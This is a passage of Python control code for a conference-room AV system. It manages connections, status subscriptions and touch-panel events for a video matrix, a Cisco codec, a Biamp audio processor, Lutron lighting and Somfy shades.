\"\"\"This is the last function that loads when starting the system \"\"\"\n ## OPEN CONNECTION SOCKETS\n ## IP\n MATRIX.Connect()\n BRIDGE.Connect()\n CISCO.Connect()\n BIAMP.Connect()\n LUTRON.Connect()\n ## RS-232\n SOMFY.Initialize()\n\n ## RECURSIVE FUNCTIONS\n update_loop_matrix()\n update_loop_bridge()\n update_loop_cisco()\n update_loop_biamp()\n\n ## POWER COUNTER VARIABLE\n global PWRCOUNT\n PWRCOUNT = 4 #Color Pwr Button Feedback 4=Too Much Red Button, 3=Red, 2=Slow Red, 1=Gray\n\n ## DATA INITIALIZE\n ## Cisco Camera PAGE\n CISCO_DATA['PresetMode'] = 'Recall'\n CISCO_DATA['Camera'] = 'Local'\n BTNGROUP['VCPTZ'].SetCurrent(BTN['VCRecall'])\n BTNGROUP['VCCam'].SetCurrent(BTN['VCLocal'])\n\n ## Cisco Dial PAGE\n global dialerVC ## To access the Dial String variable in all program\n dialerVC = '' ## Clean the Dial String Variable\n CISCO_DATA['Dial'] = '' ## Clean the Dial Data in Dictionary\n LBL['VCDial'].SetText('') ## Clean the Dial Data in GUI\n\n ## VoIP Dial PAGE\n global dialerVI ## To access the Dial String variable in all program\n dialerVI = '' ## Clean the Dial String Variable\n VOIP_DATA['Dial'] = '' ## Clean the Dial Data in Dictionary\n LBL['Dial'].SetText('') ## Clean the Dial Data in gui\n\n ## TOUCH PANEL FUNCTIONS\n TLP.HideAllPopups()\n TLP.ShowPage(PAGE['Index'])\n BTNGROUP['Main'].SetCurrent(None) ##Turn Off all feedback button in GUI Main PAGE\n LBL['CountAll'].SetText('')\n\n ## NOTIFY TO CONSOLE\n print('System Inicializate')\n pass\n\n## SUBSCRIBE FUNCTIONS ---------------------------------------------------------\ndef subscribe_matrix():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n MATRIX.SubscribeStatus('ConnectionStatus', None, matrix_parsing)\n MATRIX.SubscribeStatus('OutputTieStatus', {'Output':'1', 'Tie Type':'Video'}, matrix_parsing)\n MATRIX.SubscribeStatus('OutputTieStatus', {'Output':'2', 'Tie Type':'Video'}, matrix_parsing)\n MATRIX.SubscribeStatus('OutputTieStatus', {'Output':'3', 'Tie Type':'Video'}, matrix_parsing)\n MATRIX.SubscribeStatus('OutputTieStatus', {'Output':'4', 'Tie Type':'Video'}, matrix_parsing)\n MATRIX.SubscribeStatus('OutputTieStatus', {'Output':'1', 'Tie Type':'Audio'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '1'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '2'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '3'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '4'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '5'}, matrix_parsing)\n MATRIX.SubscribeStatus('SignalStatus', {'Input' : '6'}, matrix_parsing)\n pass\n\ndef subscribe_bridge():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n BRIDGE.SubscribeStatus('ConnectionStatus', None, bridge_parsing)\n BRIDGE.SubscribeStatus('HDMIInputEDID', None, bridge_parsing)\n BRIDGE.SubscribeStatus('USBHostStatus', None, bridge_parsing)\n BRIDGE.SubscribeStatus('USBTerminalType', None, bridge_parsing)\n BRIDGE.SubscribeStatus('VideoSendStatus', None, bridge_parsing)\n BRIDGE.SubscribeStatus('VideoSignalPresence', None, bridge_parsing)\n pass\n\ndef subscribe_cisco():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n CISCO.SubscribeStatus('ConnectionStatus', None, cisco_parsing)\n CISCO.SubscribeStatus('CallStatus', {'Call':'1'}, cisco_parsing)\n CISCO.SubscribeStatus('PresentationMode', None, cisco_parsing)\n CISCO.SubscribeStatus('Standby', None, cisco_parsing)\n CISCO.SubscribeStatus('AutoAnswer', None, cisco_parsing)\n CISCO.SubscribeStatus('Volume', None, cisco_parsing)\n pass\n\ndef subscribe_biamp():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n BIAMP.SubscribeStatus('ConnectionStatus', None, biamp_parsing)\n BIAMP.SubscribeStatus('MuteControl', {'Instance Tag':'lvl_spk', 'Channel':'1'}, biamp_parsing)\n BIAMP.SubscribeStatus('MuteControl', {'Instance Tag':'lvl_vcrx', 'Channel':'1'}, biamp_parsing)\n BIAMP.SubscribeStatus('MuteControl', {'Instance Tag':'mute_mix', 'Channel':'1'}, biamp_parsing)\n BIAMP.SubscribeStatus('LevelControl', {'Instance Tag':'lvl_spk', 'Channel':'1'}, biamp_parsing)\n pass\n\ndef subscribe_lutron():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n LUTRON.SubscribeStatus('ConnectionStatus', None, lutron_parsing)\n pass\n\ndef subscribe_somfy():\n \"\"\"This send Subscribe Commands to Device \"\"\"\n SOMFY.SubscribeStatus('ConnectionStatus', None, somfy_parsing)\n pass\n\n## UPDATE FUNCTIONS ------------------------------------------------------------\ndef update_matrix():\n \"\"\"This send Update Commands to Device\"\"\"\n MATRIX.Update('OutputTieStatus', {'Output':'1', 'Tie Type':'Video'})\n MATRIX.Update('OutputTieStatus', {'Output':'2', 'Tie Type':'Video'})\n MATRIX.Update('OutputTieStatus', {'Output':'3', 'Tie Type':'Video'})\n MATRIX.Update('OutputTieStatus', {'Output':'4', 'Tie Type':'Video'})\n MATRIX.Update('OutputTieStatus', {'Output':'1', 'Tie Type':'Audio'})\n MATRIX.Update('SignalStatus', {'Input' : '1'})\n MATRIX.Update('SignalStatus', {'Input' : '2'})\n MATRIX.Update('SignalStatus', {'Input' : '3'})\n MATRIX.Update('SignalStatus', {'Input' : '4'})\n MATRIX.Update('SignalStatus', {'Input' : '5'})\n MATRIX.Update('SignalStatus', {'Input' : '6'})\n pass\n\ndef update_bridge():\n \"\"\"This send Update Commands to Device\"\"\"\n BRIDGE.Update('ConnectionStatus')\n BRIDGE.Update('HDMIInputEDID')\n BRIDGE.Update('USBHostStatus')\n BRIDGE.Update('USBTerminalType')\n BRIDGE.Update('VideoSendStatus')\n BRIDGE.Update('VideoSignalPresence')\n pass\n\ndef update_cisco():\n \"\"\"This send Update Commands to Device\"\"\"\n CISCO.Update('CallStatus', {'Call':'1'})\n CISCO.Update('PresentationMode')\n CISCO.Update('Standby')\n CISCO.Update('AutoAnswer')\n CISCO.Update('Volume')\n pass\n\ndef update_biamp():\n \"\"\"This send Update Commands to Device\"\"\"\n BIAMP.Update('MuteControl', {'Instance Tag':'lvl_spk', 'Channel':'1'})\n BIAMP.Update('MuteControl', {'Instance Tag':'lvl_vcrx', 'Channel':'1'})\n BIAMP.Update('MuteControl', {'Instance Tag':'mute_mix', 'Channel':'1'})\n BIAMP.Update('LevelControl', {'Instance Tag':'lvl_spk', 'Channel':'1'})\n pass\n\ndef update_lutron():\n \"\"\"This send Update Commands to Device\"\"\"\n LUTRON.Update('OutputLevel', {'Integration ID':'2'})\n pass\n\n## DATA PARSING FUNCTIONS ------------------------------------------------------\n## These functions receive the data of the devices in real time\n## Each function stores the parsed data in dictionaries and activate feedback\n## Each function works with the subscription methods of the Python modules\ndef matrix_parsing(command, value, qualifier):\n \"\"\"Retrieve the Real Information of the Device \"\"\"\n if command == 'ConnectionStatus':\n print('Matrix Module Conex status: {}'.format(value))\n\n if value == 'Connected':\n MATRIX_DATA['ConexModule'] = True\n BTN['LANMatrix'].SetState(1)\n else:\n MATRIX_DATA['ConexModule'] = False\n BTN['LANMatrix'].SetState(0)\n ## Disconnect the IP Socket\n MATRIX.Disconnect()\n\n elif command == 'OutputTieStatus':\n if qualifier['Output'] == '1': ## Left Display\n if qualifier['Tie Type'] == 'Video':\n if value == '1':\n BTNGROUP['LCD1_S'].SetCurrent(BTN['LHDMI'])\n elif value == '2':\n BTNGROUP['LCD1_S'].SetCurrent(BTN['LVGA'])\n elif value == '3':\n BTNGROUP['LCD1_S'].SetCurrent(BTN['LPTZ'])\n elif value == '4':\n BTNGROUP['LCD1_S'].SetCurrent(BTN['LShare'])\n\n elif qualifier['Output'] == '2': ## Right Display\n if qualifier['Tie Type'] == 'Video':\n if value == '1':\n BTNGROUP['LCD2_S'].SetCurrent(BTN['RHDMI'])\n elif value == '2':\n BTNGROUP['LCD2_S'].SetCurrent(BTN['RVGA'])\n elif value == '3':\n BTNGROUP['LCD2_S'].SetCurrent(BTN['RPTZ'])\n elif value == '4':\n BTNGROUP['LCD2_S'].SetCurrent(BTN['RShare'])\n\n elif qualifier['Output'] == '3': ## VC Content Input\n if qualifier['Tie Type'] == 'Video':\n if value == '1':\n BTNGROUP['VCPC_S'].SetCurrent(BTN['VCHDMI'])\n elif value == '2':\n BTNGROUP['VCPC_S'].SetCurrent(BTN['VCVGA'])\n elif value == '3':\n BTNGROUP['VCPC_S'].SetCurrent(BTN['VCPTZ'])\n elif value == '4':\n BTNGROUP['VCPC_S'].SetCurrent(BTN['VCShare'])\n\n elif qualifier['Output'] == '4': ## Webex Input\n if qualifier['Tie Type'] == 'Video':\n if value == '1':\n BTNGROUP['Webex'].SetCurrent(BTN['WHDMI'])\n elif value == '2':\n BTNGROUP['Webex'].SetCurrent(BTN['WVGA'])\n elif value == '3':\n BTNGROUP['Webex'].SetCurrent(BTN['WPTZ'])\n elif value == '4':\n BTNGROUP['Webex'].SetCurrent(BTN['WShare'])\n elif value == '5':\n BTNGROUP['Webex'].SetCurrent(BTN['WCisco1'])\n elif value == '6':\n BTNGROUP['Webex'].SetCurrent(BTN['WCisco2'])\n\n elif qualifier['Output'] == '1': ## Audio HDMI Matrix Dembedder\n if qualifier['Tie Type'] == 'Audio':\n if value == '1':\n BTNGROUP['Audio'].SetCurrent(BTN['XHDMI'])\n elif value == '2':\n BTNGROUP['Audio'].SetCurrent(BTN['XVGA'])\n elif value == '4':\n BTNGROUP['Audio'].SetCurrent(BTN['XShare'])\n\n elif command == 'SignalStatus':\n if qualifier['Input'] == '1':\n if value == 'Signal Detected':\n BTN['Signal1'].SetState(1)\n else:\n BTN['Signal1'].SetState(0)\n elif qualifier['Input'] == '2':\n if value == 'Signal Detected':\n BTN['Signal2'].SetState(1)\n else:\n BTN['Signal2'].SetState(0)\n elif qualifier['Input'] == '3':\n if value == 'Signal Detected':\n BTN['Signal3'].SetState(1)\n else:\n BTN['Signal3'].SetState(0)\n elif qualifier['Input'] == '4':\n if value == 'Signal Detected':\n BTN['Signal4'].SetState(1)\n else:\n BTN['Signal4'].SetState(0)\n elif qualifier['Input'] == '5':\n if value == 'Signal Detected':\n BTN['Signal5'].SetState(1)\n else:\n BTN['Signal5'].SetState(0)\n elif qualifier['Input'] == '6':\n if value == 'Signal Detected':\n BTN['Signal6'].SetState(1)\n else:\n BTN['Signal6'].SetState(0)\n pass\n\ndef bridge_parsing(command, value, qualifier):\n \"\"\"Retrieve the Real Information of the Device \"\"\"\n if command == 'ConnectionStatus':\n print('Bridge Module Conex status: {}'.format(value))\n\n if value == 'Connected':\n BRIDGE_DATA['ConexModule'] = True\n BTN['LanBridge'].SetState(1)\n else:\n BRIDGE_DATA['ConexModule'] = False\n BTN['LanBridge'].SetState(0)\n ## Disconnect the IP Socket\n BRIDGE.Disconnect()\n\n elif command == 'HDMIInputEDID':\n print(value)\n BRIDGE_DATA['InputEDID'] = value\n\n elif command == 'USBHostStatus':\n print(value)\n BRIDGE_DATA['USBHost'] = value\n\n elif command == 'USBTerminalType':\n print(value)\n BRIDGE_DATA['USBTerminal'] = value\n\n elif command == 'VideoSendStatus':\n print(value)\n if value == 'On':\n BRIDGE_DATA['VideoSend'] = True\n else:\n BRIDGE_DATA['VideoSend'] = False\n\n elif command == 'VideoSignalPresence':\n print(value)\n if value == 'Signal':\n BRIDGE_DATA['VideoSignal'] = True\n else:\n BRIDGE_DATA['VideoSignal'] = False\n pass\n\ndef cisco_parsing(command, value, qualifier):\n \"\"\"Retrieve the Real Information of the Device \"\"\"\n if command == 'ConnectionStatus':\n print('Cisco Module Conex status: {}'.format(value))\n\n if value == 'Connected':\n CISCO_DATA['ConexModule'] = True\n BTN['LANCisco'].SetState(1)\n else:\n CISCO_DATA['ConexModule'] = False\n BTN['LANCisco'].SetState(0)\n ## Disconnect the IP Socket\n CISCO.Disconnect()\n\n elif command == 'CallStatus':\n print(qualifier + value)\n CISCO_DATA['Call'] = value\n\n elif command == 'PresentationMode':\n print(value)\n CISCO_DATA['Content'] = value\n\n elif command == 'Standby':\n print(value)\n if value == 'Activate':\n CISCO_DATA['Power'] = True\n else:\n CISCO_DATA['Power'] = False\n\n elif command == 'AutoAnswer':\n if value == 'On':\n CISCO_DATA['AutoAnswer'] = True\n BTN['VCAutoAn'].SetState(1)\n elif value == 'Off':\n CISCO_DATA['AutoAnswer'] = False\n BTN['VCAutoAn'].SetState(0)\n\n elif command == 'Volume':\n print(value)\n LVL['VC'].SetLevel(value) ## Send volume value to Level Bar\n CISCO_DATA['Volume'] = value ## Store volume value in dictionary\n pass\n\ndef biamp_parsing(command, value, qualifier):\n \"\"\"Retrieve the Real Information of the Device \"\"\"\n if command == 'ConnectionStatus':\n print('Biamp Module Conex status: {}'.format(value))\n\n if value == 'Connected':\n BIAMP_DATA['ConexModule'] = True\n BTN['LANBiamp'].SetState(1)\n else:\n BIAMP_DATA['ConexModule'] = False\n BTN['LANBiamp'].SetState(0)\n ## Turn Off feedback Buttons\n LVL['Spk'].SetLevel(-100)\n ## Disconnect the IP Socket\n BIAMP.Disconnect()\n\n elif command == 'MuteControl':\n print(str(qualifier) + ' ' + str(value))\n\n if qualifier['Instance Tag'] == 'lvl_spk':\n if value == 'On':\n BIAMP_DATA['MuteSpk'] = True\n BTN['XSpk'].SetState(1)\n elif value == 'Off':\n BIAMP_DATA['MuteSpk'] = False\n BTN['XSpk'].SetState(0)\n\n elif qualifier['Instance Tag'] == 'lvl_vcrx':\n if value == 'On':\n BIAMP_DATA['MuteVCRx'] = True\n BTN['XVC'].SetState(1)\n elif value == 'Off':\n BIAMP_DATA['MuteVCRx'] = False\n BTN['XVC'].SetState(0)\n\n elif qualifier['Instance Tag'] == 'mute_mix':\n if value == 'On':\n BIAMP_DATA['Mute_Mics'] = True\n BTN['XMics'].SetState(1)\n elif value == 'Off':\n BIAMP_DATA['Mute_Mics'] = False\n BTN['XMics'].SetState(0)\n\n elif command == 'LevelControl':\n print(str(qualifier) + ' ' + str(value))\n value = int(value) ## Convert reported volume to Integer\n LVL['Spk'].SetLevel(value) ## Send volume value to Level Bar\n BIAMP_DATA['lvl_spk'] = value ## Store volume value in dictionary\n pass\n\ndef lutron_parsing(command, value, qualifier):\n \"\"\"Retrieve the Real Information of the Device \"\"\"\n if command == 'ConnectionStatus':\n print('Lutron Module Conex status: {}'.format(value))\n\n if value == 'Connected':\n LUTRON_DATA['ConexModule'] = True\n BTN['LANLutron'].SetState(1)\n else:\n LUTRON_DATA['ConexModule'] = False\n BTN['LANLutron'].SetState(0)\n ## Disconnect the IP Socket\n LUTRON.Disconnect()\n pass\n\ndef somfy_parsing(command, value, qualifier):\n \"\"\"Retrieve the Real Information of the Device \"\"\"\n if command == 'ConnectionStatus':\n print('Somfy Module Conex status: {}'.format(value))\n\n if value == 'Connected':\n SOMFY_DATA['ConexModule'] = True\n BTN['232Somfy'].SetState(1)\n else:\n SOMFY_DATA['ConexModule'] = False\n BTN['232Somfy'].SetState(0)\n\n pass\n## EVENT FUNCTIONS ----------------------------------------------------------------\n## This functions report a 'Online' / 'Offline' status after to send a Connect()\n## CAUTION: If you never make a Connect(), the Module never work with Subscriptions\n@event(MATRIX, 'Connected')\n@event(MATRIX, 'Disconnected')\ndef matrix_conex_event(interface, state):\n \"\"\"MATRIX CONNECT() STATUS \"\"\"\n print('Matrix Conex Event: ' + state)\n if state == 'Connected':\n BTN['LANMatrix'].SetState(1)\n MATRIX_DATA['ConexEvent'] = True\n ## Send & Query Information\n subscribe_matrix()\n update_matrix()\n if state == 'Disconnected':\n BTN['LANMatrix'].SetState(0)\n MATRIX_DATA['ConexEvent'] = False\n trying_matrix()\n pass\n\n@event(BRIDGE, 'Connected')\n@event(BRIDGE, 'Disconnected')\ndef bridge_conex_event(interface, state):\n \"\"\"BRIDGE CONNECT() STATUS \"\"\"\n print('Bridge Conex Event: ' + state)\n if state == 'Connected':\n BTN['LanBridge'].SetState(1)\n BRIDGE_DATA['ConexEvent'] = True\n ## Send & Query Information\n subscribe_bridge()\n update_bridge()\n if state == 'Disconnected':\n BTN['LanBridge'].SetState(0)\n BRIDGE_DATA['ConexEvent'] = False\n trying_bridge()\n pass\n\n@event(CISCO, 'Connected')\n@event(CISCO, 'Disconnected')\ndef cisco_conex_event(interface, state):\n \"\"\"CISCO CONNECT() STATUS \"\"\"\n print('Cisco Conex Event: ' + state)\n if state == 'Connected':\n BTN['LANCisco'].SetState(1)\n CISCO_DATA['ConexEvent'] = True\n ## Send & Query Information\n subscribe_cisco()\n update_cisco()\n if state == 'Disconnected':\n BTN['LANCisco'].SetState(0)\n CISCO_DATA['ConexEvent'] = False\n trying_cisco()\n pass\n\n@event(BIAMP, 'Connected')\n@event(BIAMP, 'Disconnected')\ndef biamp_conex_event(interface, state):\n \"\"\"DEVICE CONNECT() STATUS \"\"\"\n print('Biamp Conex Event: ' + state)\n if state == 'Connected':\n BTN['LANBiamp'].SetState(1)\n BIAMP_DATA['ConexEvent'] = True\n ## Send & Query Information\n subscribe_biamp()\n update_biamp()\n if state == 'Disconnected':\n BTN['LANBiamp'].SetState(0)\n BIAMP_DATA['ConexEvent'] = False\n trying_biamp()\n pass\n\n@event(LUTRON, 'Connected')\n@event(LUTRON, 'Disconnected')\ndef lutron_conex_event(interface, state):\n \"\"\"DEVICE CONNECT() STATUS \"\"\"\n print('Lutron Conex Event: ' + state)\n if state == 'Connected':\n BTN['LANLutron'].SetState(1)\n LUTRON_DATA['ConexEvent'] = True\n ## Send & Query Information\n subscribe_lutron()\n update_lutron()\n if state == 'Disconnected':\n BTN['LANLutron'].SetState(0)\n LUTRON_DATA['ConexEvent'] = False\n trying_lutron()\n pass\n\n## RECURSIVE FUNCTIONS ------------------------------------------------------------\n## Help´s when the device was Off in the first Connect() method when the code starts\ndef trying_matrix():\n \"\"\"Try to make a Connect() to device\"\"\"\n if MATRIX_DATA['ConexEvent'] == False:\n print('Tryng to make a Connect() in Matrix')\n MATRIX.Connect(4) ## Have 4 seconds to try to connect\n pass\nloop_trying_matrix = Wait(5, trying_matrix)\n\ndef trying_bridge():\n \"\"\"Try to make a Connect() to device\"\"\"\n if BRIDGE_DATA['ConexEvent'] == False:\n print('Tryng to make a Connect() in Bridge')\n BRIDGE.Connect(4) ## Have 4 seconds to try to connect\n pass\nloop_trying_bridge = Wait(5, trying_bridge)\n\ndef trying_cisco():\n \"\"\"Try to make a Connect() to device\"\"\"\n if CISCO_DATA['ConexEvent'] == False:\n print('Tryng to make a Connect() in Cisco')\n CISCO.Connect(4) ## Have 4 seconds to try to connect\n pass\nloop_trying_cisco = Wait(5, trying_cisco)\n\ndef trying_biamp():\n \"\"\"Try to make a Connect() to device\"\"\"\n if BIAMP_DATA['ConexEvent'] == False:\n print('Tryng to make a Connect() in Biamp')\n BIAMP.Connect(4) ## Have 4 seconds to try to connect\n pass\nloop_trying_biamp = Wait(5, trying_biamp)\n\ndef trying_lutron():\n \"\"\"Try to make a Connect() to device\"\"\"\n if LUTRON_DATA['ConexEvent'] == False:\n print('Tryng to make a Connect() in Lutron')\n LUTRON.Connect(4) ## Have 4 seconds to try to connect\n pass\nloop_trying_lutron = Wait(5, trying_lutron)\n\n## RECURSIVE LOOP FUNCTIONS -----------------------------------------------------------\n## This not affect any device\n## This return True / False when no response is received from Module\n## If in 5 times the data is not reported (connectionCounter = 5) from the Update Command\n## Generate 'Connected' / 'Disconnected'\n\ndef update_loop_matrix():\n \"\"\"Continuos Update Commands to produce Module Connected / Disconnected\"\"\"\n MATRIX.Update('SignalStatus', {'Input':'1'})\n loop_update_matrix.Restart()\nloop_update_matrix = Wait(12, update_loop_matrix)\n\ndef update_loop_bridge():\n \"\"\"Continuos Update Commands to produce Module Connected / Disconnected\"\"\"\n BRIDGE.Update('AutoImage')\n loop_update_bridge.Restart()\nloop_update_bridge = Wait(12, update_loop_bridge)\n\ndef update_loop_cisco():\n \"\"\"Continuos Update Commands to produce Module Connected / Disconnected\"\"\"\n CISCO.Update('AutoAnswer')\n loop_update_cisco.Restart()\nloop_update_cisco = Wait(12, update_loop_cisco)\n\ndef update_loop_biamp():\n \"\"\"Continuos Update Commands to produce Module Connected / Disconnected\"\"\"\n BIAMP.Update('VerboseMode')\n loop_update_biamp.Restart()\nloop_update_biamp = Wait(12, update_loop_biamp)\n\ndef update_loop_lutron():\n \"\"\"Continuos Update Commands to produce Module Connected / Disconnected\"\"\"\n LUTRON.Update('OutputLevel', {'Integration ID':'2'})\n loop_update_lutron.Restart()\nloop_update_lutron = Wait(12, update_loop_lutron)\n\n## DATA DICTIONARIES -----------------------------------------------------------\n## Each dictionary store the real time information of room devices\n## IP\nMATRIX_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n}\n\nBRIDGE_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n ##\n 'InputEDID' : '',\n 'USBHost' : '',\n 'USBTerminal': '',\n 'VideoSend' : None,\n 'VideoSignal': None,\n}\n\nCISCO_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n ##\n 'AutoAnswer' : None,\n 'CallStatus' : '',\n 'Camera' : '',\n 'Dial' : '',\n 'Power' : None,\n 'PresetMode' : '',\n 'Volume' : None,\n}\n\nBIAMP_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n ##\n 'MuteSpk' : None,\n 'MuteVCRx' : None,\n 'Mute_Mics' : None,\n 'lvl_spk' : None,\n}\n\nVOIP_DATA = {\n 'Dial' : '',\n 'DTMF' : False\n}\n\nLUTRON_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n}\n\n## RS-232\nSOMFY_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n}\n\n## IR-Serial\nLCD1_DATA = {\n 'Input' : '',\n 'Power' : '',\n}\n\nLCD2_DATA = {\n 'Input' : '',\n 'Power' : '',\n}\n## PAGE USER EVENTS ------------------------------------------------------------\n## PAGE Index ------------------------------------------------------------------\n@event(BTN['Index'], 'Pressed')\ndef index_events(button, state):\n \"\"\"User Actions: Touch Index Page\"\"\"\n TLP.ShowPage(PAGE['Main'])\n TLP.ShowPopup(POPUP['Hi'])\n print('Touch Mode: %s' % 'Index')\n pass\n\n## PAGE Main -------------------------------------------------------------------\n@event(BTNPAGE['Main'], BTNSTATE['List'])\ndef main_events(button, state):\n \"\"\"User Actions: Touch Main Page\"\"\"\n if button is BTN['Video'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['Video'])\n LBL['Master'].SetText('Seleccionar Display')\n print('Touch Mode: %s' % 'Video')\n\n elif button is BTN['VC'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['VC'])\n LBL['Master'].SetText('Control de Videoconferencia')\n print('Touch Mode: %s' % 'VC')\n\n elif button is BTN['Webex'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['Webex'])\n LBL['Master'].SetText('Control de Webconferencia')\n print('Touch Mode: %s' % 'Webex')\n\n elif button is BTN['VoIP'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['VoIP'])\n LBL['Master'].SetText('Telefonía IP')\n print('Touch Mode: %s' % 'VoIP')\n\n elif button is BTN['Lights'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['Lights'])\n LBL['Master'].SetText('Control de Iluminación')\n print('Touch Mode: %s' % 'Lights')\n\n elif button is BTN['Audio'] and state == 'Pressed':\n ## Query Data from Biamp\n update_biamp()\n TLP.ShowPopup(POPUP['Audio'])\n LBL['Master'].SetText('Control de Audio')\n print('Touch Mode: %s' % 'Audio')\n\n elif button is BTN['Status'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['Status'])\n LBL['Master'].SetText('Información de Dispositivos')\n print('Touch Mode: %s' % 'Status')\n\n elif button is BTN['PwrOff'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['Power'])\n LBL['Master'].SetText('¿Deseas Apagar el Sistema?')\n print('Touch Mode: %s' % 'PowerOff')\n\n ##Turn On the feedbak of last pressed button\n BTNGROUP['Main'].SetCurrent(button)\n pass\n\n## PAGE Video ------------------------------------------------------------------\n@event(BTNPAGE['Video'], BTNSTATE['List'])\ndef video_events(button, state):\n \"\"\"User Actions: Touch Video Page\"\"\"\n if button is BTN['DisplayL'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['LCD1'])\n LBL['Master'].SetText('Control de Pantalla Izquierda')\n print('Video Mode: %s' % 'Display L')\n\n elif button is BTN['DisplayR'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['LCD2'])\n LBL['Master'].SetText('Control de Pantalla Derecha')\n print('Video Mode: %s' % 'Display R')\n pass\n\n## PAGE Display L --------------------------------------------------------------\n@event(BTNPAGE['LCD1'], BTNSTATE['List'])\ndef display_l_events(button, state):\n \"\"\"User Actions: Touch LCD-L Page\"\"\"\n if button is BTN['LHDMI'] and state == 'Pressed':\n ## HDMI to Display Left - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'1', 'Output':'1', 'Tie Type':'Video'})\n print('Button Pressed - LCD L: %s' % 'HDMI')\n\n elif button is BTN['LVGA'] and state == 'Pressed':\n ## VGA to Display Left - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'2', 'Output':'1', 'Tie Type':'Video'})\n print('Button Pressed - LCD L: %s' % 'VGA')\n\n elif button is BTN['LPTZ'] and state == 'Pressed':\n ## PTZ to Display Left - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'3', 'Output':'1', 'Tie Type':'Video'})\n print('Button Pressed - LCD L: %s' % 'PTZ')\n\n elif button is BTN['LShare'] and state == 'Pressed':\n ## ShareLink to Display Left - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'4', 'Output':'1', 'Tie Type':'Video'})\n print('Button Pressed - LCD L: %s' % 'ShareLink')\n\n elif button is BTN['LPwrOn'] and state == 'Pressed':\n ## The system send the command action directly\n print('Button Pressed - LCD L: %s' % 'PowerOn')\n\n elif button is BTN['LPwrOff'] and state == 'Pressed':\n ## The system send the command action directly\n print('Button Pressed - LCD L: %s' % 'PowerOff')\n\n elif button is BTN['LBack'] and state == 'Pressed':\n ## Hide actual POPUP and show the Display Selection POPUP\n TLP.ShowPopup(POPUP['Video'])\n print('Button Pressed - LCD L: %s' % 'Back')\n pass\n\n## PAGE Display R --------------------------------------------------------------\n@event(BTNPAGE['LCD2'], BTNSTATE['List'])\ndef display_r_events(button, state):\n \"\"\"User Actions: Touch LCD-R Page\"\"\"\n if button is BTN['RHDMI'] and state == 'Pressed':\n ## HDMI to Display Right - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'1', 'Output':'2', 'Tie Type':'Video'})\n print('Button Pressed - LCD R: %s' % 'HDMI')\n\n elif button is BTN['RVGA'] and state == 'Pressed':\n ## VGA to Display Right - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'2', 'Output':'2', 'Tie Type':'Video'})\n print('Button Pressed - LCD R: %s' % 'VGA')\n\n elif button is BTN['RPTZ'] and state == 'Pressed':\n ## PTZ to Display Right - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'3', 'Output':'2', 'Tie Type':'Video'})\n print('Button Pressed - LCD R: %s' % 'PTZ')\n\n elif button is BTN['RShare'] and state == 'Pressed':\n ## ShareLink to Display Right - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'4', 'Output':'2', 'Tie Type':'Video'})\n print('Button Pressed - LCD R: %s' % 'ShareLink')\n\n elif button is BTN['RPwrOn'] and state == 'Pressed':\n ## The system send the command action directly\n print('Button Pressed - LCD R: %s' % 'PowerOn')\n\n elif button is BTN['RPwrOff'] and state == 'Pressed':\n ## The system send the command action directly\n print('Button Pressed - LCD R: %s' % 'PowerOff')\n\n elif button is BTN['RBack'] and state == 'Pressed':\n ## Hide actual POPUP and show the Display Selection POPUP\n TLP.ShowPopup(POPUP['Video'])\n print('Button Pressed - LCD R: %s' % 'Back')\n pass\n\n## PAGE VC ---------------------------------------------------------------------\n@event(BTNPAGE['VCCall'], BTNSTATE['List'])\ndef vc_call_events(button, state):\n \"\"\"User Actions: Touch VC Page\"\"\"\n if button is BTN['VCCall'] and state == 'Pressed':\n ##--This button dial the number typed on the touch panel (Cisco VC)\n CISCO.Set('Hook', 'Dial', {'Protocol':'H323', 'Number': CISCO_DATA['Dial']})\n print('Button Pressed - VC: %s' % 'Call')\n\n elif button is BTN['VCHangup'] and state == 'Pressed':\n ##--This button hangs up all active calls (Cisco VC)\n CISCO.Set('Hook', 'Disconnect All', {'Protocol':'H323'})\n print('Button Pressed - VC: %s' % 'Hangup')\n pass\n\n## This function is called when the user press a Dial Button\n## This function add or remove data from the panel Dial Number\ndef dialer_vc(btn_name):\n \"\"\"User Actions: Touch VC Page\"\"\"\n global dialerVC\n\n if btn_name == 'Delete': #If the user push 'Delete' button\n dialerVC = dialerVC[:-1] #Remove the last char of the string\n CISCO_DATA['Dial'] = dialerVC #Asign the string to the data dictionary\n LBL['VCDial'].SetText(dialerVC) #Send the string to GUI Label\n\n else: #If the user push a [*#0-9] button\n number = str(btn_name[4]) #Extract the valid character of BTN name\n dialerVC += number #Append the last char to the string\n CISCO_DATA['Dial'] = dialerVC #Asign the string to the data dictionary\n LBL['VCDial'].SetText(dialerVC) #Send the string to GUI Label\n pass\n\n@event(BTNPAGE['VCDial'], BTNSTATE['List'])\ndef vc_dial_events(button, state):\n 